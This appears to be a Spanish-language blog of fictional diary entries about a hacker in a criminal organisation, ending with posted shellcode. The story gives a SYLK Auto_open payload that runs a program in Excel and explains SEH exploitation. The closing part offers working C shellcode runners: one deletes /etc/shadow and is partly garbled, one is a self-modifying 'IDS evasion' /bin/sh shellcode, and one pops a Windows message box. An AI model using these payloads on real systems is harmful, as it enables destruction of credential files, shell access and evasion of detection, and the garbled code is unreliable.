Domingo, 3 de Noviembre de 2019: Un problema a la vez

Querido Diario…

Enrique me dejó en la frente a la puerta, y bajó a abrirme. Al abrir la puerta del coche sentí el frío de la noche y el aroma a jardín. Salí del coche, mientras Enrique acomodaba mi saco, me quede viendo hacía la fuente. El viento golpeaba el agua y me rociaba la cara. Una vez que mi saco estuvo listo, me despedí de Enrique y toqué la puerta.

Abrieron la puerta, salude asintiendo la cabeza y entonces me pasé. Fui conducido hasta un salón grande, en donde estaba La condesa, con algunos de sus colaborares, incluyendo a Patricia, y junto a una silla vacía, Janey, que al verme abrió los ojos de sorpresa… espero, sorpresa buena.

Me acerqué a la silla vacía, mientras le daba a Janey un golpecito en el hombro y le guiñaba el ojo, para darle a saber que todo estaba bien. Me quité el sacó y se lo dí al sirviente.

- Don Augusto - se dirigió hacia mi La condesa.

Se le apodaban así por sus desplantes de riqueza, no tenía mesura en demostrar lo bien que le iba en los negocios; desde que se hacía cargo de ellos. A su esposo, lo habían asesinado hace unos años cerca de Guerrero, y a decir verdad, esos negocios empezaron a ir mejor desde que ella estaba al frente; había sabido diversificar los ingresos, y su violencia era tan fuerte, que sus competidores y socios les temían.

- Condesa, un placer - le salude también asintiendo la cabeza, mientras esperaba me indicase que me sentase
- Un hombre con gustos clásicos, me encantan los hombres en trajes de tres piezas - su mirada me incomodaba, aun no estoy tan desesperado como para tener una sugar mommy, así que sólo sonreí y tomé asiento
- Sirve para cubrir la lonja
- Que bueno que nos acompaña Don Augusto, tenía mucho tiempo que quería conocerlo. Es muy diferente a como me lo imaginé
- ¿Si?, ¿Por qué lo dice Condesa?
- Ya sabe lo que decía José Vasconcelos: "donde empieza la carne asada, la civilización ac... " - interrumpí su comentario discriminatorio
- Descuida Condesa, soy Chilango
- Si, así parece; dígame Don Augusto, ¿le gustaría elegir lo que beberemos? - me dijo, mientras me señalaba la cava

La miré detenidamente, tenía vinos alemanes de los llamados ice wines; extremadamente caros, pero decidí tomar algo más normal. Tomé la botella y se la entregué al sirviente.

- ¿Bebirius? - exclamó La condesa
- Está rico, ne gusta su acidez, además la historia de porque la familia Comenge le dio ese nombre es muy buena
- ¿Ah si?, ¿cual es?
- Bueno, el emperador Tiberius intentó invadir esa región, pero era muy mal conquistador, así que mientras sus tropas mantuvieron el sitio, él se la pasó conociendo los viñedos y las mujeres. En latín, Biberius quería decir algo como "él que bebe el caldo caliente", y bueno... creo que no necesito decir que el caldo caliente no se refiere al vino
- Jijijiji... - rió - que indiscreto

El sirviente empezó a servir, Janey me veía de reojo, su nerviosismo era evidente. Una vez que tuve llena mi copa, golpeé la de ella y le sonreí.

Sirvieron la cena y comí tranquilamente, Janey apenas tocó el plato. El ambiente estaba lleno de tensión, fuera de mi, sólo La Condesa comía tranquila, platicando sobre sus grandes planes; a los que yo únicamente me limite a escuchar. Sus invitados, unos tipos que casi no hablaban me veían de reojo, nerviosos, pero entre ellos sonriendo con complicidad. Debían de ser ellos.

Al llegar el postre vi que venía algo de chocolate, porque aproveche el momento para hacer la salida, el acto y demostrar que no les tenía miedo.

- Condesa, me disculpo por tener rechazar su postre; pero mi chofer está fuera esperando para llevarme a otra reunión importante. Quería únicamente platicar con usted ciertos detalles de nuestra operación, pero sin duda no pude negarme a compartir un momento con usted
- Le agradezco Don Augusto, una lastima que no disfrute el chocolate
- No es mi estilo - levanté la mano y le pedí al sirviente una pluma, en una tarjeta anoté "la está traicionando, búsqueme"

Me puse de pie y me acerque a La condesa, apenas lo hice y los invitados se pusieron de pie en alerta. Así que me acerqué con sutileza y le di la tarjeta

- Le dejó mi tarjeta, una disculpa; hace poco cambié mi número y no he impreso nuevas, pero se lo he anotado - me puse tras Janey para jalar su silla - nos retiramos Condesa; las transferencias por sus ganancias llegarán durante la semana. Si tiene alguna duda, por favor, no dude en buscarme. 
- Le agradezco las atenciones. Patricia, por favor, begleiten Sie unseren Besucher zur Tür und stellen Sie sie in Frage. Es scheint wichtige Informationen zu haben

Retiré la silla de Janey y ella me siguió, cruzamos el salón y a la salida me entregaron mi saco. Entonces salimos y Enrique ya estaba estacionado fuera de la casa. Cuando íbamos a avanzas, hacía la libertad, Patricia nos detuvo.

- Augusto
- ¿Dónde quedó el "Don"?, ¿ya no hay respeto?
- Hum... ¿qué es lo que tienes?
- Esos dos de allí, son quienes están traicionando a La Condesa
- ¿Ah si?, ¿tienes pruebas? - saqué mi celular y lo mostré una screenshot tomada de un Excel - ¿Cómo la obtuviste?
- Abuso de archivos SYLK
- Explicate
- Los .slk son archivos que existen desde 1980, y hasta ahora siguen siendo mapeados por Excel por defecto, incluso por las versiones de OS X, que son las que usan ellos - quise recalcar OS X - lo más importante de estos archivos, es que la protección del view sanbox no aplica para ellos; como para las Macros comunes, eso los hace perfecto

- Cuéntame más - Patricia estaba poniendo atención, mucha... desde que dije OS X
- Es posible crear archivos SYLK con payloads dentro, puedes tomar, si gustas, el ejemplo más sencillo; abrir una simple calculadora:
ID;P 
O;E 
NN;NAuto_open;ER101C1
C;X1;Y101;EEXEC("CALC.EXE") 
C;X1;Y102;EHALT() 
E
- Después de eso, cargas el archivo y ejecutará. La calculadora es el inicio, después de ello, sólo es dejar correr tu imaginación, y planear la forma de entrega. Como sabes, las shellcodes son mi especialidad.

- Lo mejor de todo - enfatice nuevamente - OS X puede aceptarlas, pero no sólo eso, la versión de Office de OS X tiene un falló que no lanza el warning sobre la existencia del SYLK. Y debido a que Microsoft ahora apuesta sólo por versiones en la nube, no le da mayor soporte a esta versión. 
- ¿Antivirus?
- Nada, es válido... podrían detectarse si encuentran algo raro en la shellcode, pero se pueden ejecutar muchas cosas sin lanzar un binario
- ¿Qué propones? - Patricia había entendido
- Comparte está información con La Condesa, para que sepa con quienes se sienta a compartir la mesa, no siempre estas rodeado de amigos
- Bien, ¿ustedes?
- Nosotros seguiremos con nuestro trabajo. Janey mañana se presentará en Querétaro, y las ordenes de compra y pago se generarán; de eso me encargo yo
- Buenas noches Augusto, eres todo lo que cuentan 
- ¿Macho, mujeriego y vividor? - mostré una leve sonrisa
- Egocéntrico, cínico y descarado

Se giró y entró a la casa. Janey me tomó del brazo y me lo apretó, como diciendo “corramos ahora que podamos”. Apenas unos minutos más tarde escuchamos los disparos; entonces me giré y la empujé a subir al coche.

- Enrique, vayámonos a la H. Organización Turbia e Ilegal
- Si Augusto

Después de un tiempo, al fin Janey habló

- Buen ataque
- Hum... nah, trucos; son simples trucos
- Jamás pensé que esos tipos estuviesen traicionando a La Condesa
- No lo hicieron - Janey me miró confundida, sus ojos se abrieron como platos
- Pero, tú... 
- Estabas tan nerviosa que no te diste cuenta la marca de sus mochilas - la miré y le mostré mi insolencia - Alienware; se veían todos ñoños, los ñoños usan Alienware, Asus, Thinkpad, cosas gamers... sólo la gente con estilo usamos Apple
- Pero... 
- Patricia, ella tenía una Macbook sobre la mesa
- ¿Ella?
- ¿No la recuerdas?
- No
- Que raro, trabaja para una de tus amigas
- ¡Mi tocaya!
- Así es, las Gemelas M; ellas son quienes están traicionando a La Condensa. 
- Pero, ¿por qué no se lo dijiste a La Condesa?, ella ya las habría matado
- Las Gemelas M son pequeñas, más o menos como nosotros; esos tipos se veían pro, son al menos unos setecientos, La Condesa los quitará de nuestro camino
- ¿Y Las Gemelas?
- Después de que Patricia les diga lo que le dije, sabrán que lo sé, es una advertencia; eso las mantendrá a raya
- ¿Y si no?
- Ya veremos, un problema a la... - Janey me interrumpió
- ... a la vez; es de las frases que siempre dices que más odio
- Lo siento, no soy multitarea....
- No estoy segura de que haya sido buena idea
- Dejaremos los negocios turbios, los demonios y todas las cosas que no sabemos hacer. Dejaremos todo y nos dedicaremos a lo que si sabemos hacer, y usaremos lo que si sabemos hacer
- ¿Y qué sabemos hacer?
- Sabemos tener más información que los demás, siempre... eso es lo nuestro, siempre saber todo de todos.

Querido Diario…

Enrique paró en la H. Organización, bajé para subir al coche alienigena y le pedí llevar a Janey a su casa. Tal vez Janey no lo entendía, pero es mejor tener un enemigo pequeño que puede ser vencido, a un aliado grande, que en algún momento nos puede comer. Somos nosotros, contra todos.

Mi teléfono comenzó a sonar… era Mom

- Bueno
- ¿Qué onda?, ¿cómo estas?
- Bien
- Que bueno, ¿cómo salio todo?
- Bien, como te dije
- Excelente. ¿Y el otro encargo?
- Listo, desde una VPN con IP arábe
- Excelente

Colgué.

Miércoles, 5 de Septiembre de 2018: Lo lindo de lo simple

Querido Diario…

Haya por los años del quién sabe cuando que no recuerdo, Microsoft, hizo una modificación interesante a la forma en que se venía llamado a los Exceptions Handlers; en Windows XP SP1.

Los Exception Handlers son una cadena de “objetos” (en realidad no son objetos, pero llevo todo el día intentado recordar como se llaman exactamente… creo que estructuras, pero no recuerdo, me quedé dormido en esa clase xD), en donde se tienen dos elementos, uno es un puntero al siguiente Exception Handler, y otro es el puntero hacia la acción que va a ejecutar ese Exception Handler. Lo que inicialmente hacían los hackers para explotar algún fallo que encontraban, era modificar el salto del EIP disparando un Exception Handler, y a su vez el Exception Handler, te mandaba hacia una dirección modificada. Para hacer eso, se tenía que ingresar directamente a la dirección de memoria del Exception Handler.

Lo que hizo Microsoft para evitar fue esto, es extremadamente sencillo. Cada que ntdll.dll dispará el SEH Chain (el inicio de la cadena de Exception Handlers) se “XORean” todas las direcciones, de esa forma antes de usarse tienen un 0x00000000, es decir.. se borra todo y se inutilizan. Y listo, así de sencillo no es posible alocar una shellcode allí. Después en Windows 2003 server implementaron el mismo cambio.

Microsoft… siempre a la vanguardia en seguridad, muy por encima de todos los S.O.’s…. (escuche un par de linuxeros rabiar y llorar por allí coff.. coff… esa cosa que aun tiene BOF’s es 2018 😛 )

Lo interesante de esto… es que es muy limpio y muy sencillo, y totalmente válido hasta la fecha para evitar la alocación directa de algún payload en una dirección de memoria. Lo que evita un clásico pop ret, ret, ret o un pop %eax o un mov directo, etc..

Querido Diario…

Siempre me ha encantado los cíclidos por su temperamento. Adoraba los Oscares, y siempre quise un FH…

Lunes, 29 de Marzo de 2018: Entrenamiento 101

Querido Diario…

Mientras Nemux volvía el martes al trabajo para iniciar el ataque, no debía de olvidarme de Lalo 2, quién debía de ser entrenado para que en caso de deceso, tuviésemos a alguien listo para seguir. Debido a que no tengo mucho que hacer, decidí hacerlo yo mismo.

Pero primero que nada… tenía que felicitar a una persona muy especial; queeee.. probablemente no me entiende mucho, pero prometí que le felicitaría el día de ayer.

с днем рождения, надеюсь, вчера был отличный день … и скоро вы сможете посетить Мексику

Si… uno cuando se la pasa viajando a dar tehuacanazos por el mundo termina haciendo muchos amigos.

Después de eso, entonces si, me comuniqué con el Becario.

Lalo 2 es algo así como el consen de Lalo, esa fue la razón porque lo seleccioné para que sea entrenado y que sustituya a alguno de nosotros, que es muy probable que no regresemos vivos.

No estoy muy seguro de como Lalo 2 llegó a nosotros, cuando yo regresé a la H. Organización Turbia e Ilegal, él ya estaba allí; lleno de ilusiones en la vida, y fui yo de hecho quién se las rompió y le mostró como era el mundo de cruel.

Le mandé su boleto de avión y unas horas más tarde lo fui a recoger al aeropuerto; para iniciar su entrenamiento me apoyé de Cachanillo. Cachanillo es un elemento desplegado en Mexicali… si, no soy el único aquí. Cachanillo es muy bueno, lo conocí una ocasión en unas conferencias en CETYS y no pude pasar a oportunidad de reclutarlo. Su único problema es que es demasiada buena persona, ética, moral, de esos que dan más de si… no encaja en el perfil de esta H. Organización, pero no podía dejarle pasar.

Pasé a recoger a Cachanillo de camino al aeropuerto; y esperamos la llegada de Lalo 2.

- Joven, esto es el infierno
- ¿Por?
- Esta haciendo un calor horrible
- Novato... Cachanillo, dile como ha estado el clima
- Fresco, aun no empieza el calor - respondió Cachanillo
- ¿Ves?... sube muchacho

Manejamos de regreso hacia la ciudad. Lalo 2 tenía cara de pánico durante el viaje, mientras Cachanillo tenía cara de felicidad; usualmente Cachanillo la pasa sólo, ni siquiera porque vivimos en la misma ciudad nos vemos mucho. Y ahora tenía una visita.

- Joven, ¿qué estoy haciendo aquÍ? - rompió Lalo 2 el silencio del viaje
- Hum... tomalo como un entrenamiento
- ¿Y tenía que ser aquí?, ¿dónde están los edificios?
- Hum... esto es un desierto, en los desiertos no hay edificios, hay cactus y arena; es café de allí se llama arena. Arena, Becario; Becario, arena. 
- Joven... tengo miedo
- Eso es bueno, el miedo nos ayuda a sobrevivir. Cachanillo, ¿te gusta la comida china?
- No
- ¿Cómo puedes ser de Mexicali y no gustarte la comida china?
- No sé, pero no me gusta
- ¿Qué quieren de comer?, pagan Mom
- ¡Pampas! dijeron a coro cuando íbamos por Benito Juárez

Comimos y estuvimos platicando un buen rato. Cachanillo y Lalo 2 no se veían desde Diciembre; y yo también ya tenía un buen tiempo de no ver a Cachanillo. Terminando llevé a Cachanillo a su casa y llevé a Lalo 2 a mi casa, allí lo hospedaría esta semana durante su entrenamiento.

- Bien muchacho, ahora es tiempo de que te expliqué porque estas aquí. Te voy a poner un vídeo para que entiendas cual es el "core" de negocios de la H. Empresa Turbia e Ilegal a la que pertenecemos.

- ¡Joven, me estoy asustando mucho con esto del core de negocios!
- Ouuuu... lo siento, lo siento... error de vídeo. Ya sabes... es frontera, gringos, hackean todo
- Ajá


Cuando terminó el vídeo veía en Lalo 2 la cara de motivación que estaba buscando, fue justo cuando supe que no nos habíamos equivocado en él.

- Bueno, ¿qué te pareció?
- Increíble joven, de hecho en mi diplomado he estado aprendiendo mucho de eso
- ¿En serio?, ¿Leobardo hace cosas así?... hum.. que interesante
- Si, podemos montar honeypots para detect....  - interrumpí
- No, no, no... no estas entendiendo... nosotros no somos los que defienden
- ¿No?
- Nou
- ¡Oh diablos!, somos unos criminales
- Eso mero
- Joven, ¿esto lo saben todos?
- Hum... si, en cierta forma si, pero por las dudas no le digas a nadie
- ¿Y ahora?, ¿me vas a enseñar a hackear?
- Hum... no, eso es algo complejo; eso no se aprende. En mis tiempos no había certificaciones, diplomados o cosas así. Yo lo que voy a hacer es enseñarte a profesionalizar tu criminalidad. Serás turbio e ilegal, perooo... no serás un turbio e ilegal cualquiera; en esta semana te convertiré en un verdadero criminal
- Quiero a mi mamá
- Regla #1, un criminal nunca teme
- Quiero romper la regla #1
- ¡Actitud Becario!, actitud... no tienes la actitud

Lalo 2 tardó un poco en entender cual era la importancia de nosotros y como trabajamos. Creo que en el fondo tenía la esperanza de ser un hombre de bien que hiciese cosas bien. Pero poco a poco lo fue aceptando, no se le veía muy alegre, pero creo que entendió.

- Joven, ¿en mi entrenamiento de menos me puedes explicar algo importante?
- ¿Cómo qué?
- Pues esos secretos del mundo de la seguridad
- Hum... yo no sé de eso; pero puedes preguntarle a Bytevik
- Dicen que tu sabías
- Dicen... hace mucho
- ¿Cómo se empezaste?
- Ya ni recuerdo - me recosté en el sofá para darle dramatismo - recuerdo que el IRC, aprendí mucho de amigos que hacían research conmigo en el RTM Security Team; luego aprendí mucho en foros de Europa del Este... ouuu.. esos tipos son como artistas, verdaderos hackers que desarrollan exploits de calidad, nada de  las porquerías de los gringos que hacen en Metasploit con tal de sacar el advisory y el PoC antes que todos. Esos tipos eran verdaderos hackers, aprendí de gente de Polonia, Rumania, Estonia, Rusia, Ucrania, Uzbequistan... que tiempos Becario, que buenos tiempos
- ¿Qué tenías que aprender?, por ejemplo... ¿cómo puedo hacer un malware como el que hace poco hiciste para la misión que fuiste a hacer con Joshua?
- Eso no fue un malware, sólo fue un payload; un malware no es cosa fácil, debes de aprender como funciona un sistema operativo y como interactua con cada uno de los archivos que utilizada, ¿sabes lo que es PE?
- No
- Bueno, pues el PE es el Portable Executable Format, usualmente empezabas por allí. PE es el formato de los archivos que usa Windows; esto es muy importante si algún día quieres ser un verdadero profesional y lanzar ataques de malware completamente orientado a un objetivo en particular. Mira - y me levanté para tomar un plumón - Esto de aquí es básicamente la estructura de un archivo PE de MS Windows.

- Pero no sólo eso, lo importante también viene en sus headers. Cuando haces un payload no tiene nada de esto, así que tienes que inyectarlo dentro de un archivo que si lo tenga para que se ejecuté. Si tu tratas de ejecutar un payload sin headers va a fallar. Cuando haces malware, tienes que incluir las headers, estrictamente es un archivo real.

- Dentro de estos headers, tenemos diferentes secciones; y cada una de ellas tiene una función en especifico. Por ejemplo, tenemos donde el archivo le indica al sistema operativo donde debe de empezar a cargar; el MZ lo vas a ver en todos lados, de hecho si usas un debugger como Immunity Dbg u Ollydbg vas a verlo muy común cuando arrancas el binario. También es muy importante para poder determinar si un archivo es original o falso o si fue modificado. Además tiene tamaños especificos, de esa forma cuando hacer el reversing podrás encontrar cada una de las secciones para su análisis. - terminé
- Interesante, ¿vamos a ver más de esto en la semana?
- No, en realidad no. Mañana te voy a enseñar a manejar un arma, así podrás sacarle las contraseñas a la gente de forma más rápida. 
- Diablos
- Descansa Becario... buenas noches
- Oiga joven, una última pregunta
- ¿Si?
- ¿Qué es eso?
- Ouuuu... esto es lo más genial del mundo; es un guarda plátanos

- Joven, es la cosa más inútil del mundo
- Pero está bonito. Buenas noches Becario
- Joven, otra cosa
- ¿Ahora qué?
- Su perro está arriba de mi
- Ouuu si, se llama Shellcode. Shellcode, Lalo 2, Lalo 2, Shellcode. Ella duerme en el sofá, así que... puede que piense que eres su nuevo colchón
- Ahhhhh... ¿hay forma que... - interrumpí
- No... y ni lo intentes, te puede morder
- Ok

Me fui a mi habitación y miré mis libros. The shellcoder’s hanbook, Windows Internals en todas sus ediciones, IDA Pro guide… ese muchacho quiere aprender cosas. Como me gustaba eso.

La nostalgia fue interrumpida por una llamada, era el Lalo, seguro me preguntaría por su cachorro

- Bueno
- Joven... dime que esta vivo
- Esta vivo, pero puede que ahorita este un poco babeado por mi perrita
- Ok, eso es bueno. ¿Por qué te lo llevaste?
- Por si tú o yo no volvemos
- Hum... - Lalo se quedó pensativo, él también entiende el riesgo al que nos enfrentamos en esta misión; el hecho de que ambos estemos trabajando juntos es el reflejo del riesgo, Mom nunca nos había puesto a los dos en una misma misión, eso quiere decir que esto es grave, tal vez más grave de lo que creemos. - ¿mañana empezamos?
- Si, le marcaré a Nemux para configurar el jump box, y cuando tengas las credenciales te las pasó
- Ok... buenas noches joven
- Buenas noches - y colgó

Querido Diario… en la semana rechacé algo que podría haber puesto fin a mi camino de turbidez e ilegalidad. Pero… hay cosas… personas, que son más importantes que cualquier otra cosa.

Tengo esperanzas en el Becario… tal vez tenga futuro. Y sino, es matemático… haré que hagan las predicciones en mis inversiones.

Without /etc/shadow


char tlayula[] =
"x31xc0"
"xb0x46"
"x31xdb"
"x31xc9"
"xcdx80"
"x31xc0"
"x50"
"x68x2fx2fx72x6d"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x68x61x64x6fx77"
"x68x2fx2fx73x68"
"x68x2fx65x74x63"
"x89xe1"
"x50"
"x51"
"x53"
"x89xe1"
"xb0x0b"
"xcdx80";
main()
{
(*(void(*) ()) tlayula)();
}

The life is cruel… and I’m worst B\

Linux/x86 IDS evasion shellcode

When I was young I learned from Sergio Alvarez (Shadow), maybe the most skilled shellcoder from Argentina, a lot of the most weird, strange and amazing shellcoding techniques. Shadow is simply awesome..

This is a PoC of shellcode I developed using his technique to self-modifying opcodes to a multipurpose, in this case is to avoid an IDS… yes I know, maybe you can’t believe me, but just try!.. it’s an old shellcode but is one of the most advanced techniques in the world 😉

char rockaleta[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";
int main ()
{
printf("Length: %d bytes\n", strlen(rockaleta));
int (*sc)() = (int (*)())rockaleta;
sc();
return 0;
}

Windows 32bit messagebox shellcode


char quesadilla_de_queso[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
int main(int argc, char **argv){int (*f)();f = (int (*)())quesadilla_de_queso;(int)(*f)();}